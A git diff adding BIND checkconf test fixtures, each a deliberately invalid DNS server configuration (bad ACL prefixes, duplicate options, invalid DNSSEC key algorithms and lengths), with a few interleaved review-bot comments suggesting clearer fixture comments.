+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl a {
+ { "none"; };
+ { !19.0.0.0/7; };
+};
+
+options {
+ allow-query { a; };
+};
diff --git a/bin/tests/system/checkconf/bad-also-notify.conf b/bin/tests/system/checkconf/bad-also-notify.conf
new file mode 100644
index 0000000..d93ff2d
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-also-notify.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * Missing master in also-notify clause.
+ */
+
+zone dummy {
+ type master;
+ file "xxxx";
+ also-notify { xxxx; };
+};
diff --git a/bin/tests/system/checkconf/bad-catz-zone.conf b/bin/tests/system/checkconf/bad-catz-zone.conf
new file mode 100644
index 0000000..6f0677a
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-catz-zone.conf
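Review bot: bad-acl.conf has no comment saying which ACL element is meant to be rejected, unlike ancient.conf and bad-also-notify.conf, which both state their defect. The likely trigger is `!19.0.0.0/7`, because 19 has a bit set below the /7 boundary (the aligned network would be 18.0.0.0/7), but the nested `{ "none"; }` element could equally be the subject. This fixture presumably guards how the config checker treats a malformed `allow-query` ACL, so once the intended failure is confirmed I would add a header comment such as `/* 19.0.0.0/7 has bits set beyond the prefix length. */`.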
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ catalog-zones {
+ zone "nonexistent";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-checknames-primary-dup-2.conf b/bin/tests/system/checkconf/bad-checknames-primary-dup-2.conf
new file mode 100644
index 0000000..24e6ef9
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-checknames-primary-dup-2.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ check-names primary warn;
+ check-names primary fail;
+};
diff --git a/bin/tests/system/checkconf/bad-checknames-primary-dup.conf b/bin/tests/system/checkconf/bad-checknames-primary-dup.conf
new file mode 100644
index 0000000..e746e84
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-checknames-primary-dup.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ check-names master warn;
+ check-names primary fail;
+};
diff --git a/bin/tests/system/checkconf/bad-checknames-secondary-dup.conf b/bin/tests/system/checkconf/bad-checknames-secondary-dup.conf
new file mode 100644
index 0000000..ea83d7e
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-checknames-secondary-dup.conf
@@ -0,0 +1,17 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ check-names slave ignore;
+ check-names secondary warn;
+};
diff --git a/bin/tests/system/checkconf/bad-dnskey-validity.conf b/bin/tests/system/checkconf/bad-dnskey-validity.conf
new file mode 100644
index 0000000..8c28ac5
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-dnskey-validity.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnskey-sig-validity 5000; /* maximum value 10 years, this is 14 */
+};
diff --git a/bin/tests/system/checkconf/bad-dnssec.conf b/bin/tests/system/checkconf/bad-dnssec.conf
new file mode 100644
index 0000000..7f1d524
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-dnssec.conf
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone not-inline {
+ type slave;
+ masters { 127.0.0.1; };
+ inline-signing no;
+ dnssec-dnskey-kskonly yes;
+ update-check-ksk yes;
+ dnssec-loadkeys-interval 10;
+
+};
+
+zone inline {
+ type slave;
+ masters { 127.0.0.1; };
+ inline-signing yes;
+ dnssec-dnskey-kskonly yes;
+ update-check-ksk yes;
+ dnssec-loadkeys-interval 10;
+};
diff --git a/bin/tests/system/checkconf/bad-duplicate-key.conf b/bin/tests/system/checkconf/bad-duplicate-key.conf
new file mode 100644
index 0000000..17f2237
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-duplicate-key.conf
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnssec-validation yes;
+};
+
+trust-anchors {
+ example. initial-key 257 3 8 "AwEAAawvFp8GlBx8Qt6yaIqXkDe+nMkSk2HkTAG7qlVBo++AQwZ1j3Xl
+ 25IN4jsw0VTMbKUbafw9DYsVzztIwx1sNkKRLo6qP9SSkBL8RicQaafG
+ tURtsYI3oqte5qqLve1CUpRD8J06Pg1xkOxsDlz9sQAyiQrOyvMbykJY
+ kYrFYGLzYAgl/JtMyVVYlBl9pqxQuAPKYPOuO1axaad/wLN3+wTy/hcJ
+ fpvJpqzXlDF9bI5RmpoX/7geZ06vpcYJEoT0xkkmPlEl0ZjEDrm/WIaS
+ WG0/CEDpHcOXFz4OEczMVpY+lnuFfKybwF1WHFn2BwVEOS6cMM6ukIjI
+ NQyrszHhWUU=";
+};
+
+trust-anchors {
+ example. static-key 257 3 8 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbod
+ y0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQ
+ YfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX
+ 2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuw
+ E60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/
+ Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn
+ 6zqCkwuMmrU=";
+};
diff --git a/bin/tests/system/checkconf/bad-duplicate-primaries-1.conf b/bin/tests/system/checkconf/bad-duplicate-primaries-1.conf
new file mode 100644
index 0000000..3bbabde
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-duplicate-primaries-1.conf
@@ -0,0 +1,15 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+primaries duplicate { 1.2.3.4; };
+primaries duplicate { 4.3.2.1; };
diff --git a/bin/tests/system/checkconf/bad-duplicate-primaries-2.conf b/bin/tests/system/checkconf/bad-duplicate-primaries-2.conf
new file mode 100644
index 0000000..1d1c6f0
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-duplicate-primaries-2.conf
@@ -0,0 +1,15 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+masters duplicate { 1.2.3.4; };
+primaries duplicate { 4.3.2.1; };
diff --git a/bin/tests/system/checkconf/bad-duplicate-root-key.conf b/bin/tests/system/checkconf/bad-duplicate-root-key.conf
new file mode 100644
index 0000000..1cbc7d4
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-duplicate-root-key.conf
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ dnssec-validation yes;
+};
+
+trust-anchors {
+ . initial-key 257 3 8 "AwEAAawvFp8GlBx8Qt6yaIqXkDe+nMkSk2HkTAG7qlVBo++AQwZ1j3Xl
+ 25IN4jsw0VTMbKUbafw9DYsVzztIwx1sNkKRLo6qP9SSkBL8RicQaafG
+ tURtsYI3oqte5qqLve1CUpRD8J06Pg1xkOxsDlz9sQAyiQrOyvMbykJY
+ kYrFYGLzYAgl/JtMyVVYlBl9pqxQuAPKYPOuO1axaad/wLN3+wTy/hcJ
+ fpvJpqzXlDF9bI5RmpoX/7geZ06vpcYJEoT0xkkmPlEl0ZjEDrm/WIaS
+ WG0/CEDpHcOXFz4OEczMVpY+lnuFfKybwF1WHFn2BwVEOS6cMM6ukIjI
+ NQyrszHhWUU=";
+};
+
+trusted-keys {
+ . 257 3 8 "AwEAAZtP9+RAA+W33A97e+HnnH8WTXzCWiEICyWj1B6rvZ9hd50ysbod
+ y0NLx7b3vZ1bzMLxLSRAr/n3Wi0TDZ1fvCKZhennfW8Wlc7ulCvHntSQ
+ YfKHUP0YWEo84sQAqIi850N1aiddj6CidwFo9JNW/HQ+8yarfrnGMFhX
+ 2STtkE0hNJ/R6JYKmD2EH7k1nyqJd08ibrEt55DuV4BiUjyyERdVbsuw
+ E60jVqAwCKyVBYXb2sI+zv1yPNDBIANd6KTgnq6YWzx5ZodQP3W4K7Z/
+ Bk3EKmVCvrTKZK/ADLAKaL0/6DD07+1jXA4BiNyoZTLTapkudkGad+Rn
+ 6zqCkwuMmrU=";
+};
diff --git a/bin/tests/system/checkconf/bad-geoip-use-ecs.conf b/bin/tests/system/checkconf/bad-geoip-use-ecs.conf
new file mode 100644
index 0000000..b22d008
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-geoip-use-ecs.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ geoip-use-ecs yes;
+};
diff --git a/bin/tests/system/checkconf/bad-glue-cache-bogus.conf b/bin/tests/system/checkconf/bad-glue-cache-bogus.conf
new file mode 100644
index 0000000..c264b26
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-glue-cache-bogus.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ glue-cache bogusvalue;
+};
diff --git a/bin/tests/system/checkconf/bad-hint.conf b/bin/tests/system/checkconf/bad-hint.conf
new file mode 100644
index 0000000..7214a00
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-hint.conf
@@ -0,0 +1,18 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone "." {
+ type hint;
+ masterfile-format raw;
+ file "hint";
+};
diff --git a/bin/tests/system/checkconf/bad-in-view-dup.conf b/bin/tests/system/checkconf/bad-in-view-dup.conf
new file mode 100644
index 0000000..5c6329c
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-in-view-dup.conf
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+view a {
+ zone x { type master; file "x"; };
+};
+
+view b {
+ zone x { type master; file "x"; };
+ zone x { in-view a; };
+};
diff --git a/bin/tests/system/checkconf/bad-inline-options.conf b/bin/tests/system/checkconf/bad-inline-options.conf
new file mode 100644
index 0000000..f7c62dd
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-inline-options.conf
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * inline-signing not allowed at options level.
+ */
+options {
+ inline-signing yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/checkconf/bad-inline-slave.conf b/bin/tests/system/checkconf/bad-inline-slave.conf
new file mode 100644
index 0000000..10e9649
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-inline-slave.conf
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+ /*
+ * An inline-signing slave should be forced to have a file option
+ */
+
+ zone "." {
+ type slave;
+ inline-signing yes;
+ masters { 10.53.0.1; };
+ };
\ No newline at end of file
diff --git a/bin/tests/system/checkconf/bad-inline-view.conf b/bin/tests/system/checkconf/bad-inline-view.conf
new file mode 100644
index 0000000..e46bd0b
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-inline-view.conf
@@ -0,0 +1,31 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * inline-signing not allowed at view level.
+ */
+view "a" {
+ inline-signing yes;
+
+ zone "." {
+ type primary;
+ file "root.db.signed";
+ };
+};
+
+view "b" {
+ zone "." {
+ type primary;
+ file "root.db";
+ };
+};
diff --git a/bin/tests/system/checkconf/bad-interface-interval.conf b/bin/tests/system/checkconf/bad-interface-interval.conf
new file mode 100644
index 0000000..ba8341a
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-interface-interval.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ interface-interval 1x;
+};
diff --git a/bin/tests/system/checkconf/bad-ipv4-prefix-dotted1.conf b/bin/tests/system/checkconf/bad-ipv4-prefix-dotted1.conf
new file mode 100644
index 0000000..d7604eb
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-ipv4-prefix-dotted1.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl myacl {
+ 127.1; /* Incomplete dotted IPv4 address / prefix */
+};
diff --git a/bin/tests/system/checkconf/bad-ipv4-prefix-dotted2.conf b/bin/tests/system/checkconf/bad-ipv4-prefix-dotted2.conf
new file mode 100644
index 0000000..cb53741
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-ipv4-prefix-dotted2.conf
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl myacl {
+ 127.1/8; /* No-zero bits */
+};
diff --git a/bin/tests/system/checkconf/bad-ipv4-prefix2.conf b/bin/tests/system/checkconf/bad-ipv4-prefix2.conf
new file mode 100644
index 0000000..98e724a
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-ipv4-prefix2.conf
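Review bot: The inline comment in bad-ipv4-prefix-dotted2.conf reads `/* No-zero bits */`, which looks like a typo for "Non-zero bits" and does not say where those bits are. The sibling fixture bad-ipv4-prefix-dotted1.conf spells out its defect in full, so I would write `/* Non-zero bits beyond the /8 prefix length */` here. That makes it clear why `127.1/8` has to be rejected when someone later touches the ACL prefix parsing.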
@@ -0,0 +1,16 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl myacl {
+ 127; /* Non-dotted quad IPv4 address (0.0.0.127) / prefix without length. */
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-define-default.conf b/bin/tests/system/checkconf/bad-kasp-define-default.conf
new file mode 100644
index 0000000..569b1a8
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-define-default.conf
@@ -0,0 +1,23 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// 'default' is a built-in policy, redefinition not allowed.
+dnssec-policy "default" {
+ signatures-refresh P5D;
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "default";
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-define-insecure.conf b/bin/tests/system/checkconf/bad-kasp-define-insecure.conf
new file mode 100644
index 0000000..060dde7
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-define-insecure.conf
@@ -0,0 +1,23 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// 'insecure' is a built-in policy, redefinition not allowed.
+dnssec-policy "insecure" {
+ signatures-refresh P5D;
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "insecure";
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-define-none.conf b/bin/tests/system/checkconf/bad-kasp-define-none.conf
new file mode 100644
index 0000000..2bdff02
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-define-none.conf
@@ -0,0 +1,23 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// 'none' is a built-in policy, redefinition not allowed.
+dnssec-policy "none" {
+ signatures-refresh P5D;
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "none";
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-duplicate.conf b/bin/tests/system/checkconf/bad-kasp-duplicate.conf
new file mode 100644
index 0000000..7f3ade6
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-duplicate.conf
@@ -0,0 +1,15 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy a { };
+dnssec-policy a { };
diff --git a/bin/tests/system/checkconf/bad-kasp-key1.conf b/bin/tests/system/checkconf/bad-kasp-key1.conf
new file mode 100644
index 0000000..b6bda15
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-key1.conf
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "badalg" {
+ keys {
+ csk lifetime unlimited algorithm ceasarscipher;
+ };
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "badalg";
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-key2.conf b/bin/tests/system/checkconf/bad-kasp-key2.conf
new file mode 100644
index 0000000..7e6a60e
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-key2.conf
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "badalg" {
+ keys {
+ csk lifetime unlimited algorithm 8 4097;
+ };
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "badalg";
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-key3.conf b/bin/tests/system/checkconf/bad-kasp-key3.conf
new file mode 100644
index 0000000..92806ff
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-key3.conf
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "badalg" {
+ keys {
+ csk lifetime unlimited algorithm rsasha512 1023;
+ };
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "badalg";
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-key4.conf b/bin/tests/system/checkconf/bad-kasp-key4.conf
new file mode 100644
index 0000000..c8e9ae6
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-key4.conf
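Review bot: bad-kasp-key2.conf reuses the policy name "badalg" from bad-kasp-key1.conf, but here the algorithm field (`8`) looks valid and the suspect value is the key length `4097`; nothing in the file says so. The same applies to bad-kasp-key3.conf (`rsasha512 1023`) and bad-kasp-key4.conf (`5 511`), which presumably probe the lower length bound. A one-line comment in each file, for example `/* key length 4097 is expected to be rejected as out of range for algorithm 8 */`, would record which limit the fixture pins. That matters when minimum RSA key sizes are raised later and someone has to decide whether a failing fixture is still testing the intended boundary.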
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "badalg" {
+ keys {
+ csk lifetime unlimited algorithm 5 511;
+ };
+};
+
+zone "example.net" {
+ type master;
+ file "example.db";
+ dnssec-policy "badalg";
+};
diff --git a/bin/tests/system/checkconf/bad-kasp-keydir1.conf.in b/bin/tests/system/checkconf/bad-kasp-keydir1.conf.in
new file mode 100644
index 0000000..b0deaea
--- /dev/null
+++ b/bin/tests/system/checkconf/bad-kasp-keydir1.conf.in
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+/*
+ * The same zone in different views is using different DNSSEC policies, so it
+ * may not have the same key-directory.
+ */
+
+
+key "keyforview1" {
+ algorithm @DEFAULT_HMAC@;
+ secret "YPfMoAk6h+3iN8MDRQC004iSNHY=";
+};
+
+key "keyforview2" {
+ algorithm @DEFAULT_HMAC@;
